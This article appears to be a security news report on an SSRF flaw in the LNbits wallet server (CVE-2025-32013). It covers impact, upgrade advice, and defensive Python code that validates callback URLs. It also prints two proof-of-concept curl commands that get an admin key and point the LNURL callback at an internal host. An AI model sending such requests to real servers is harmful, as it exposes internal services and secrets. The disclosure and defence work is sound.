LNbits, the modular and extendable Lightning Network wallet server, has patched a critical Server-Side Request Forgery (SSRF) vulnerability that exposed internal services to potential exploitation via manipulated LNURL authentication flows. Tracked as CVE-2025-32013, the flaw carries a severity score of CVSSv4 9.3, indicating a high risk of impact on systems using vulnerable versions.
LNbits is widely used by developers, merchants, and Lightning enthusiasts to create scalable wallets, test extensions, and integrate Lightning functionality across various applications. But as the platform gains popularity, so do the risks of misconfigured or vulnerable features.
The vulnerability resides in the way LNbits handles LNURL authentication callback parameters. When a user authenticates via LNURL, LNbits makes an HTTP request to the callback URL provided by the user. However, the platform fails to validate whether that URL is safe or points to external versus internal resources.
"The application doesn't properly validate the callback URL, allowing attackers to specify internal network addresses and access internal resources," the LNbits Security Advisory explains.
As a result, attackers can craft LNURL auth requests that cause LNbits to initiate requests to sensitive internal IP addresses (e.g., http://localhost, http://192.168.0.1), enabling unauthorized access to private endpoints, metadata, internal tools, or even file content.
The attack involves just two steps:
1. Create a new wallet account to get an admin key:

curl -X POST http://target:5000/api/v1/account -d '{"name":"test"}'

2. Use the obtained admin key to send a crafted LNURL authentication request:

curl -X POST http://target:5000/api/v1/lnurlauth \
  -H "X-Api-Key: <admin_key>" \
  -H "Content-Type: application/json" \
  -d '{ "callback": "http://target-internal-server/?tag=login&k1=9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "k1": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "sig": "0"*128, "key": "0"*64 }'

The LNbits server will follow the attacker-supplied callback URL, even if it points to an internal host or local IP, and return its contents in the HTTP response.
"The vulnerability can be used to read internal files, access internal services, and potentially expose sensitive information from the internal network."
While authentication is required to exploit this vulnerability, any user who can create a wallet obtains the admin key the request needs, so the bar is low. This means that multi-user LNbits deployments, particularly those accessible over the internet, are at significant risk.
Misuse could lead to:
- Leaked internal API documentation
- Access to configuration metadata
- Credential or token exposure
- Reconnaissance for lateral movement inside cloud or local networks

All LNbits users are urged to upgrade to version 1.0.0 or higher to avoid exposure.
The LNbits team advises the following defenses:
- Validate Callback URLs: Ensure only trusted domains or IP ranges are permitted.
- Use Whitelisting: Only allow URLs from known-safe networks.
- Disable Redirects: Prevent the system from blindly following redirects in callback responses.
- Use Secure Proxies: Route requests through gateways that filter out access to internal services.
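The first three recommendations above can be combined into one pre-request check. The following is an added example written for this article, not LNbits' own code; it assumes a hypothetical resolver hook, a constructed MAX_REDIRECTS limit, and a caller-supplied fetch function that has redirects disabled so each Location hop is re-validated before it is requested.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Optional, Tuple
from urllib.parse import urlparse

MAX_REDIRECTS = 3  # constructed limit; LNbits' own value is not on the page

def default_resolver(host: str) -> Iterable[str]:
    """Resolve a hostname to every A/AAAA address it has (assumed helper)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_ip(addr: str) -> bool:
    """True only for globally routable unicast addresses: rejects loopback,
    RFC 1918, link-local (incl. cloud metadata 169.254.169.254), reserved."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # judge ::ffff:127.0.0.1 as the IPv4 it wraps
    return ip.is_global and not ip.is_multicast

def validate_callback_url(url: str, resolver=default_resolver) -> str:
    """Return url if it is http(s) and its host resolves only to public
    addresses; raise ValueError otherwise. The resolver is injectable."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        raise ValueError(f"unsupported or hostless callback: {url!r}")
    if parsed.username or parsed.password:
        raise ValueError("credentials in callback URL are not allowed")
    host = parsed.hostname
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal: skip DNS
    except ValueError:
        addrs = list(resolver(host))
    # Every resolved address must be public, or a split answer could slip in.
    if not addrs or not all(is_public_ip(a) for a in addrs):
        raise ValueError(f"callback host {host!r} is not a public address")
    return url

def fetch_callback(url: str, fetch: Callable[[str], Tuple[int, Optional[str], str]],
                   resolver=default_resolver) -> str:
    """fetch(url) must NOT follow redirects; it returns (status, Location, body).
    Each Location target is validated again before being requested, so a
    public host cannot bounce the server onto an internal one."""
    for _ in range(MAX_REDIRECTS + 1):
        validate_callback_url(url, resolver)
        status, location, body = fetch(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = location
            continue
        return body
    raise ValueError("too many redirects")
```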